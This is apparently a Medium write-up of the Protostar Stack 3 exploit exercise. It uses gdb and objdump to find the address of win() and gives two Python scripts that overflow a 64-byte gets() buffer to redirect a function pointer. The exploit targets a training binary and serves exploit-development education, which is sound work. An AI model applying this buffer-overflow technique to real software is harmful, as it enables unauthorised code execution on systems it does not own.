[ExpDev] Exploit Exercise | Protostar | Stack 3

Stack 3

The goal of this challenge is to find a environment variable for the win() func and overwriting the func pointer stored on the stack via BOF.

  • gets(buffer);: The vulnerable func. It reads a line from stdin but it doesn’t check for buffer overrun → which can be vulnerable to BOF type of attacks.
  • win(): Winning func. Once we overflow the buffer via gets(), we can print out the winning statement by pointing to the win() address on the stack.
  • char buffer[64];: This limits our buffer length as 64 bytes. → which we can enter more than 64 bytes to cause a BOF.

Exploit

As the website’s hints, we can search for the win() address with gdb or objdump.

[GDB]
$ gdb -q stack3
(gdb) x win
0x8048424 <win>: 0x83e58955
[objdump]
$ objdump -t stack3 |grep win
08048424 g F .text 00000014 win

Let’s create the following exploit with python:

[Exploit-1]#!/usr/bin/python 
padding = "A" * 60 # Giving 60 padding
padding+= "BBBBCCCCDDDDEEEEFFFF" # Using different letters

print padding

When we run this against the stack3 program, we now see the “modified” value is overwritten with “0x43434343” (“0x43 = C).

So our offset value is 64 (60 + BBBB).

We have everything we need: offset value (=64) + address location for win() (=0x08048424).

[Exploit-2]#!/usr/bin/python# win() = 0x8048424padding = "A" * 64
padding+= "\x24\x84\x04\x08" # Little-endian
print padding

When we run this against stack3, we can successfully print out the winning statement.

Thanks for reading!

  • Stack 4 — Stack-based BOF: Basic 4

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store